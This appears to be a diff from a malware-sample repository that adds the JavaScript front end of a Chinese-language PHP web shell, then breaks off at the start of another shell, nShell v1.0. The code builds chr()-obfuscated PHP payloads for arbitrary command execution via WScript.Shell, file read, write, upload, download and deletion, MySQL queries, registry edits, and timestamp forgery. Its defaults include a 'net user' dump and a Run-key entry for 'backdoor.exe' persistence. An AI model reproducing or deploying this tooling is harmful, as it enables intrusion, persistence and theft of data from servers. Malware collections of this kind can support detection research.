yunxing.innerHTML="<p align='center'>目录名:<br><INPUT size=24 name=\"duqu\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;readdir();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
case "7":
|
||||||
|
yunxing.innerHTML="<p align='center'>文件1:<br><INPUT size=24 name=\"file1\"><br>文件2:<br><INPUT size=24 name=\"file2\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;copyfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
case "8":
|
||||||
|
yunxing.innerHTML="<p align='center'>文件1:<br><INPUT size=24 name=\"file1\"><br>文件2:<br><INPUT size=24 name=\"file2\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;renamefile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
case "9":
|
||||||
|
yunxing.innerHTML="<p align='center'>文件名:<br><INPUT size=24 name=\"filen\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;delfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
case "10":
|
||||||
|
yunxing.innerHTML="<p align='center'><textarea rows='12' name='duqu' cols='22'>phpinfo();</textarea>"
|
||||||
|
yunxing.innerHTML+="<INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;frm.tmpcmd.value=frm.duqu.value;frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br>字符转换工具:<hr size='1' color='#000000'>要转换的字符:<br><INPUT type=text name=\"inputstr\" size='23' ><br>转换后的字符:<br><textarea cols='22' rows=\"4\" name=\"chrstr\" ></textarea><br><INPUT type=button name=strtxtdd onclick=\"ascchar()\" value=\"转 换\" >"
|
||||||
|
break;
|
||||||
|
case "11":
|
||||||
|
yunxing.innerHTML="主机:<input NAME=\"servername\" TYPE=\"text\" value=\"localhost\" size=\"12\" ><BR>数据库:<input NAME=\"dbname\" TYPE=\"text\" value size=\"10\" > <BR>用户名:<input NAME=\"dbusername\" TYPE=\"text\" value=\"root\" size=\"10\" > <BR>密码:<input NAME=\"dbpassword\" TYPE=\"text\" value size=\"12\" > <BR>SQL语句:<BR><textarea rows=\"8\" name=\"sql\" cols=\"20\" ></textarea>"
|
||||||
|
yunxing.innerHTML+="<br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;SQL();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send>"
|
||||||
|
break;
|
||||||
|
|
||||||
|
|
||||||
|
case "12":
|
||||||
|
yunxing.innerHTML="<p align='center'>文件名:<INPUT size=14 name=\"filen\"><br>文件内容:<BR><textarea rows=\"16\" name=\"filec\" cols=\"20\" ></textarea><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;createfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
case "13":
|
||||||
|
yunxing.innerHTML="<p align='center'>文件名:<br><INPUT size=24 name=\"filen\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;downfile();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
case "14":
|
||||||
|
yunxing.innerHTML="<p align='center'>目录名:<br><INPUT size=24 name=\"dir\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;createdir();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
case "15":
|
||||||
|
yunxing.innerHTML="<p align='center'>目录名:<br><INPUT size=24 name=\"dir\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;rmdir();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
case "16":
|
||||||
|
yunxing.innerHTML="<p align='center'>服务器基本信息<br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;info();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
case "17":
|
||||||
|
yunxing.innerHTML="<p align='center'>文件:<br><INPUT size=24 name=\"cmdpath\" value=\"c:/winnt/system32/cmd.exe\"><br>参数:<br><INPUT size=24 name=\"runfile\" value=\"/c net user > c:/log.txt\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;runcmd();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
case "18":
|
||||||
|
yunxing.innerHTML="<p align='center'>键值:<br><INPUT size=24 name=\"regpath\" value=\"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;readreg();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
case "19":
|
||||||
|
yunxing.innerHTML="<p align='center'>键值:<br><INPUT size=24 name=\"regpath\" value=\"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Backdoor\"><br>类型:<select name='regtype'><option value='REG_SZ' selected>REG_SZ</option><option value='REG_BINARY' >REG_BINARY</option><option value='REG_DWORD' >REG_DWORD</option><option value='REG_MULTI_SZ' >REG_MULTI_SZ</option><option value='REG_EXPAND_SZ' >REG_EXPAND_SZ</option></select><br>值:<INPUT size=24 name=\"regval\" value=\"c:\\winnt\\backdoor.exe\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;writereg();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
case "20":
|
||||||
|
yunxing.innerHTML="<p align='center'>键值:<br><INPUT size=24 name=\"regpath\" value=\"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;delreg();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
case "21":
|
||||||
|
yunxing.innerHTML="<p align='center'>参照文件:<br><INPUT size=24 name=\"file1\" value=\"c:\\boot.ini\"><br>克隆文件:<br><INPUT size=24 name=\"file2\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;domodtime();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
case "22":
|
||||||
|
yunxing.innerHTML="<p align='center'>URL:<INPUT size=24 name=\"url\"><br><INPUT onclick='Javascipt:frm.tmpcmd.name=frm.para.value;urlproxy();frm.action=document.all.act.value;frm.submit();frm.tmpcmd.name=tmpcmd' type=button value='提 交' name=Send><br><br><br><br><br><br><br><br><br><br>"
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
function urlproxy(){
|
||||||
|
frm.tmpcmd.value="$url="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.url.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="if (isset($url)) {$proxycontents = @file_get_contents($url);\n"
|
||||||
|
frm.tmpcmd.value+=" echo ($proxycontents) ? $proxycontents:获取URL内容失败;}\n"
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
function domodtime(){
|
||||||
|
frm.tmpcmd.value="$file1="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.file1.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="$file2="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.file2.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="$time=@filemtime($file1);\n"
|
||||||
|
frm.tmpcmd.value+="echo (@touch($file2,$time,$time)) ? basename($file2).的修改时间成功改为.date(chr(89).chr(45).chr(109).chr(45).chr(100).chr(32).chr(72).chr(58).chr(105).chr(58).chr(115),$time).chr(33) : 文件的修改时间修改失败;\n"
|
||||||
|
}
|
||||||
|
|
||||||
|
function writereg(){
|
||||||
|
frm.tmpcmd.value="$regpath="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.regpath.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="$regtype="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.regtype.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="$regval="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.regval.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="$s= &new COM(chr(87).chr(83).chr(99).chr(114).chr(105).chr(112).chr(116).chr(46).chr(83).chr(104).chr(101).chr(108).chr(108));\n"
|
||||||
|
frm.tmpcmd.value+="$a=@$s->RegWrite($regpath,$regval,$regtype);\n"
|
||||||
|
frm.tmpcmd.value+="echo ($a==0) ? chr(79).chr(75).chr(33) : chr(70).chr(65).chr(73).chr(76).chr(33);"
|
||||||
|
}
|
||||||
|
|
||||||
|
function delreg(){
|
||||||
|
frm.tmpcmd.value="$regpath="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.regpath.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="$s= &new COM(chr(87).chr(83).chr(99).chr(114).chr(105).chr(112).chr(116).chr(46).chr(83).chr(104).chr(101).chr(108).chr(108));"
|
||||||
|
frm.tmpcmd.value+="$a=@$s->RegDelete($regpath);\n"
|
||||||
|
frm.tmpcmd.value+="echo ($a==0) ? chr(79).chr(75).chr(33) : chr(70).chr(65).chr(73).chr(76).chr(33);"
|
||||||
|
}
|
||||||
|
|
||||||
|
function readreg(){
|
||||||
|
frm.tmpcmd.value="$regpath="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.regpath.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="$shell= &new COM(chr(87).chr(83).chr(99).chr(114).chr(105).chr(112).chr(116).chr(46).chr(83).chr(104).chr(101).chr(108).chr(108));"
|
||||||
|
frm.tmpcmd.value+="var_dump(@$shell->RegRead($regpath));\n"
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
function runcmd(){
|
||||||
|
frm.tmpcmd.value="$a="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.cmdpath.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="$b="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.runfile.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="$s= &new COM(chr(83).chr(104).chr(101).chr(108).chr(108).chr(46).chr(65).chr(112).chr(112).chr(108).chr(105).chr(99).chr(97).chr(116).chr(105).chr(111).chr(110));\n"
|
||||||
|
frm.tmpcmd.value+="$c = $s->ShellExecute($a,$b);\n"
|
||||||
|
frm.tmpcmd.value+="if(!$c) echo chr(79).chr(75).chr(33);\n"
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
function cmd(){
|
||||||
|
|
||||||
|
if (frm.execfun.value =='syscom'){
|
||||||
|
frm.tmpcmd.value="$cmd="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.cmdname.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="echo chr(60).chr(116).chr(101).chr(120).chr(116).chr(97).chr(114).chr(101).chr(97).chr(32).chr(99).chr(111).chr(108).chr(115).chr(61).chr(56).chr(48).chr(32).chr(114).chr(111).chr(119).chr(115).chr(61).chr(50).chr(54).chr(62);\n"
|
||||||
|
frm.tmpcmd.value+="$wsh = new COM(chr(87).chr(83).chr(99).chr(114).chr(105).chr(112).chr(116).chr(46).chr(83).chr(104).chr(101).chr(108).chr(108)) or die(chr(102).chr(97).chr(105).chr(108).chr(101).chr(100).chr(33));\n"
|
||||||
|
frm.tmpcmd.value+="$exec = $wsh->exec(chr(99).chr(109).chr(100).chr(46).chr(101).chr(120).chr(101).chr(32).chr(47).chr(99).chr(32).$cmd);\n"
|
||||||
|
frm.tmpcmd.value+="$stdout = $exec->StdOut ();\n"
|
||||||
|
frm.tmpcmd.value+="$stroutput = $stdout->ReadAll ();\n"
|
||||||
|
frm.tmpcmd.value+="echo ($stroutput);\n"
|
||||||
|
frm.tmpcmd.value+="echo chr(60).chr(47).chr(116).chr(101).chr(120).chr(116).chr(97).chr(114).chr(101).chr(97).chr(62);\n"
|
||||||
|
}
|
||||||
|
|
||||||
|
else{
|
||||||
|
if (frm.execfun.value =='`'){
|
||||||
|
frm.tmpcmd.value="$cmd="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.cmdname.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="echo chr(60).chr(116).chr(101).chr(120).chr(116).chr(97).chr(114).chr(101).chr(97).chr(32).chr(99).chr(111).chr(108).chr(115).chr(61).chr(56).chr(48).chr(32).chr(114).chr(111).chr(119).chr(115).chr(61).chr(50).chr(54).chr(62);\n"
|
||||||
|
frm.tmpcmd.value+="echo"
|
||||||
|
frm.tmpcmd.value+=frm.execfun.value
|
||||||
|
frm.tmpcmd.value+="$cmd"
|
||||||
|
frm.tmpcmd.value+=frm.execfun.value
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="echo chr(60).chr(47).chr(116).chr(101).chr(120).chr(116).chr(97).chr(114).chr(101).chr(97).chr(62);\n"
|
||||||
|
|
||||||
|
}
|
||||||
|
else{
|
||||||
|
frm.tmpcmd.value="$cmd="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.cmdname.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="echo chr(60).chr(116).chr(101).chr(120).chr(116).chr(97).chr(114).chr(101).chr(97).chr(32).chr(99).chr(111).chr(108).chr(115).chr(61).chr(56).chr(48).chr(32).chr(114).chr(111).chr(119).chr(115).chr(61).chr(50).chr(54).chr(62);\n"
|
||||||
|
frm.tmpcmd.value+="echo "
|
||||||
|
frm.tmpcmd.value+=frm.execfun.value
|
||||||
|
frm.tmpcmd.value+="($cmd);\n"
|
||||||
|
frm.tmpcmd.value+="echo chr(60).chr(47).chr(116).chr(101).chr(120).chr(116).chr(97).chr(114).chr(101).chr(97).chr(62);\n"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
function copyfile(){
|
||||||
|
frm.tmpcmd.value="$file1="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.file1.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="$file2="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.file2.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="if (@copy($file1,$file2)) echo chr(79).chr(75).chr(33);\n"
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
function renamefile(){
|
||||||
|
|
||||||
|
frm.tmpcmd.value="$file1="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.file1.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="$file2="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.file2.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="if (@rename($file1,$file2)) echo chr(79).chr(75).chr(33);\n"
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
function downfile(){
|
||||||
|
frm.tmpcmd.value="$df="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.filen.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="$f=chr(46);"
|
||||||
|
frm.tmpcmd.value+="$h=chr(67).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(45).chr(116).chr(121).chr(112).chr(101).chr(58).chr(32).chr(97).chr(112).chr(112).chr(108).chr(105).chr(99).chr(97).chr(116).chr(105).chr(111).chr(110).chr(47).chr(120).chr(45);\n"
|
||||||
|
frm.tmpcmd.value+="$h1=chr(67).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(45).chr(68).chr(105).chr(115).chr(112).chr(111).chr(115).chr(105).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32).chr(97).chr(116).chr(116).chr(97).chr(99).chr(104).chr(109).chr(101).chr(110).chr(116).chr(59).chr(32).chr(102).chr(105).chr(108).chr(101).chr(110).chr(97).chr(109).chr(101).chr(61);\n"
|
||||||
|
frm.tmpcmd.value+="$h2=(68).chr(101).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32).chr(80).chr(72).chr(80).chr(51).chr(32).chr(71).chr(101).chr(110).chr(101).chr(114).chr(97).chr(116).chr(101).chr(100).chr(32).chr(68).chr(97).chr(116).chr(97);\n"
|
||||||
|
frm.tmpcmd.value+="$h3=chr(67).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(45).chr(76).chr(101).chr(110).chr(103).chr(116).chr(104).chr(58);\n"
|
||||||
|
frm.tmpcmd.value+="$fn = @basename($df);\n"
|
||||||
|
frm.tmpcmd.value+="$fe = $finfo[count($finfo)-1];\n"
|
||||||
|
frm.tmpcmd.value+="$finfo = explode($f, $fn);\n"
|
||||||
|
frm.tmpcmd.value+="header($h.$fe);\n"
|
||||||
|
frm.tmpcmd.value+="header($h1.$fn);\n"
|
||||||
|
frm.tmpcmd.value+="header($h2);\n"
|
||||||
|
frm.tmpcmd.value+="header($h3.filesize($df));\n"
|
||||||
|
frm.tmpcmd.value+="@readfile($df);\n"
|
||||||
|
frm.tmpcmd.value+="exit;\n"
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
function readfile(){
|
||||||
|
frm.tmpcmd.value="$filename="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.duqu.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="$s=chr(60).chr(112).chr(114).chr(101).chr(62);\n"
|
||||||
|
frm.tmpcmd.value+="$e=chr(60).chr(47).chr(112).chr(114).chr(101).chr(62);\n"
|
||||||
|
frm.tmpcmd.value+="$fp=@fopen($filename,r);\n"
|
||||||
|
frm.tmpcmd.value+="$contents=@fread($fp, filesize($filename));\n"
|
||||||
|
frm.tmpcmd.value+="@fclose($fp);\n"
|
||||||
|
frm.tmpcmd.value+="$contents=htmlspecialchars($contents);\n"
|
||||||
|
frm.tmpcmd.value+="echo $s.$contents.$e;\n"
|
||||||
|
}
|
||||||
|
function readdir(){
|
||||||
|
frm.tmpcmd.value="$dir="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.duqu.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="$f = chr(60).chr(98).chr(114).chr(62);"
|
||||||
|
frm.tmpcmd.value+="$dir=@dir($dir);"
|
||||||
|
frm.tmpcmd.value+="if($dir) "
|
||||||
|
frm.tmpcmd.value+="{"
|
||||||
|
frm.tmpcmd.value+=" echo path_______.$dir->path.$f;"
|
||||||
|
frm.tmpcmd.value+=" while($entry=$dir->read())"
|
||||||
|
frm.tmpcmd.value+=" {"
|
||||||
|
frm.tmpcmd.value+=" echo ____.$entry.$f; "
|
||||||
|
frm.tmpcmd.value+=" }"
|
||||||
|
frm.tmpcmd.value+=" $dir->close();"
|
||||||
|
frm.tmpcmd.value+="}"
|
||||||
|
frm.tmpcmd.value+="else"
|
||||||
|
frm.tmpcmd.value+="{echo 0;}"
|
||||||
|
}
|
||||||
|
|
||||||
|
function SQL(){
|
||||||
|
frm.tmpcmd.value="$message=chr(102).chr(97).chr(105).chr(108).chr(33);\n"
|
||||||
|
frm.tmpcmd.value+="$fgf=chr(32);\n"
|
||||||
|
if(frm.dbpassword.value !=''){
|
||||||
|
frm.tmpcmd.value+="$dbpassword= "
|
||||||
|
frm.tmpcmd.value+=duqu(frm.dbpassword.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
}
|
||||||
|
frm.tmpcmd.value+="$servername="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.servername.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="$dbusername="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.dbusername.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="$dbname="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.dbname.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="$sql="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.sql.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="@mysql_connect($servername,$dbusername,$dbpassword) or die($message);\n"
|
||||||
|
frm.tmpcmd.value+="@mysql_select_db($dbname) or die($message);\n"
|
||||||
|
frm.tmpcmd.value+="$sql=stripslashes($sql);\n"
|
||||||
|
frm.tmpcmd.value+="$result = @mysql_query($sql);\n"
|
||||||
|
frm.tmpcmd.value+="while($row=mysql_fetch_array($result,MYSQL_BOTH)){\n"
|
||||||
|
frm.tmpcmd.value+="for($j=0;$j<count($row);$j++){\n"
|
||||||
|
frm.tmpcmd.value+="print($row[$j].$fgf);}\n"
|
||||||
|
frm.tmpcmd.value+="echo chr(60).chr(98).chr(114).chr(62);}\n"
|
||||||
|
frm.tmpcmd.value+="mysql_free_result($result);\n"
|
||||||
|
frm.tmpcmd.value+="mysql_close();\n"
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
function createfile(){
|
||||||
|
|
||||||
|
frm.tmpcmd.value="$filen="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.filen.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="$filec="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.filec.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="$a=chr(119);\n"
|
||||||
|
frm.tmpcmd.value+="$fp=@fopen($filen,$a);\n"
|
||||||
|
frm.tmpcmd.value+="$msg=@fwrite($fp,$filec);\n"
|
||||||
|
frm.tmpcmd.value+="if($msg) echo chr(79).chr(75).chr(33);\n"
|
||||||
|
frm.tmpcmd.value+="@fclose($fp);\n"
|
||||||
|
}
|
||||||
|
|
||||||
|
11111111111111111
|
||||||
|
|
||||||
|
|
||||||
|
function delfile(){
|
||||||
|
frm.tmpcmd.value="$filen="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.filen.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="if(@unlink($filen)) echo chr(79).chr(75).chr(33);"
|
||||||
|
}
|
||||||
|
|
||||||
|
function createdir(){
|
||||||
|
frm.tmpcmd.value="$dirs="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.dir.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="if(@mkdir($dirs,0777)) echo chr(79).chr(75).chr(33);"
|
||||||
|
}
|
||||||
|
|
||||||
|
function rmdir(){
|
||||||
|
frm.tmpcmd.value="$dirs="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.dir.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value+="if(@rmdir($dirs)) echo chr(79).chr(75).chr(33);"
|
||||||
|
}
|
||||||
|
|
||||||
|
function upfile(){
|
||||||
|
frm.tmpcmd.value="$uploaddir="
|
||||||
|
frm.tmpcmd.value+=duqu(frm.uploaddir.value)
|
||||||
|
frm.tmpcmd.value+=";\n"
|
||||||
|
frm.tmpcmd.value="if (strlen($uploaddir)<1){\n"
|
||||||
|
frm.tmpcmd.value+="$updir=$_FILES[LanKerF][name];}\n"
|
||||||
|
frm.tmpcmd.value+="else{\n"
|
||||||
|
frm.tmpcmd.value+="$updir=$uploaddir.chr(47).$_FILES[LanKerF][name];}\n"
|
||||||
|
frm.tmpcmd.value+="if(@copy($_FILES[LanKerF][tmp_name],$updir)) echo upfile.chr(58).$updir.chr(32).chr(32).OK.chr(33);"
|
||||||
|
}
|
||||||
|
|
||||||
|
function ascchar(){
|
||||||
|
frm.chrstr.value=duqu(frm.inputstr.value)
|
||||||
|
}
|
||||||
|
|
||||||
|
function info(){
|
||||||
|
frm.tmpcmd.value="echo 服务器系统.chr(58);"
|
||||||
|
frm.tmpcmd.value+="echo PHP_OS;"
|
||||||
|
frm.tmpcmd.value+="echo chr(60).chr(98).chr(114).chr(62);"
|
||||||
|
frm.tmpcmd.value+="echo 服务器操作系统文字编码.chr(58);"
|
||||||
|
frm.tmpcmd.value+="echo $_SERVER[HTTP_ACCEPT_LANGUAGE];"
|
||||||
|
frm.tmpcmd.value+="echo chr(60).chr(98).chr(114).chr(62);"
|
||||||
|
frm.tmpcmd.value+="echo 服务器IP.chr(58);"
|
||||||
|
frm.tmpcmd.value+="echo $_SERVER[SERVER_NAME];"
|
||||||
|
frm.tmpcmd.value+="echo chr(60).chr(98).chr(114).chr(62);"
|
||||||
|
frm.tmpcmd.value+="echo Web服务端口端口.chr(58);"
|
||||||
|
frm.tmpcmd.value+="echo $_SERVER[SERVER_PORT];"
|
||||||
|
frm.tmpcmd.value+="echo chr(60).chr(98).chr(114).chr(62);"
|
||||||
|
frm.tmpcmd.value+="echo PHP运行方式.chr(58);"
|
||||||
|
frm.tmpcmd.value+="echo strtoupper(php_sapi_name());"
|
||||||
|
frm.tmpcmd.value+="echo chr(60).chr(98).chr(114).chr(62);"
|
||||||
|
frm.tmpcmd.value+="echo PHP版本.chr(58);"
|
||||||
|
frm.tmpcmd.value+="echo PHP_VERSION;"
|
||||||
|
frm.tmpcmd.value+="echo chr(60).chr(98).chr(114).chr(62);"
|
||||||
|
frm.tmpcmd.value+="echo 本文件路径.chr(58);"
|
||||||
|
frm.tmpcmd.value+="echo $_SERVER[PATH_TRANSLATED];"
|
||||||
|
}
|
||||||
|
</script>
|
||||||
|
<script >
|
||||||
|
function duqu(strcode){
|
||||||
|
var duqu="";
|
||||||
|
for(i=1;i<strcode.length;i++){
|
||||||
|
if(strcode.charCodeAt(i-1)<256){
|
||||||
|
duqu+="chr("+strcode.charCodeAt(i-1)+").";
|
||||||
|
}
|
||||||
|
else
|
||||||
|
duqu+=strcode.charAt(i-1)+".";
|
||||||
|
}
|
||||||
|
if(strcode.charCodeAt(i-1)<256){
|
||||||
|
duqu+="chr("+strcode.charCodeAt(strcode.length-1)+")";
|
||||||
|
}
|
||||||
|
else
|
||||||
|
duqu+=strcode.charAt(strcode.length-1);
|
||||||
|
return duqu
|
||||||
|
}
|
||||||
|
</script>
|
5603
PHP/Backdoor.PHP.NFMshell.c
Normal file
5603
PHP/Backdoor.PHP.NFMshell.c
Normal file
File diff suppressed because it is too large
Load Diff
1464
PHP/Backdoor.PHP.NShell.a
Normal file
1464
PHP/Backdoor.PHP.NShell.a
Normal file
File diff suppressed because it is too large
Load Diff
371
PHP/Backdoor.PHP.NShell.c
Normal file
371
PHP/Backdoor.PHP.NShell.c
Normal file
@ -0,0 +1,371 @@
|
|||||||
|
?»?<head>
|
||||||
|
<title> nShell v1.0</title>
|
||||||
|
<style>
|
||||||
|
html { overflow-x: auto }
|
||||||
|
A: {font-weight:bold};
|
||||||
|
A:link {COLOR:red; TEXT-DECORATION: none}
|
||||||
|
A:visited { COLOR:red; TEXT-DECORATION: none}
|
||||||
|
A:active {COLOR:red; TEXT-DECORATION: none}
|
||||||
|
A:hover {color:blue;TEXT-DECORATION: none}
|
||||||
|
submit {
|
||||||
|
BORDER-RIGHT: buttonhighlight 2px outset;
|
||||||
|
BORDER-TOP: buttonhighlight 2px outset;
|
||||||
|
BORDER-LEFT: buttonhighlight 2px outset;
|
||||||
|
BORDER-BOTTOM: buttonhighlight 2px outset;
|
||||||
|
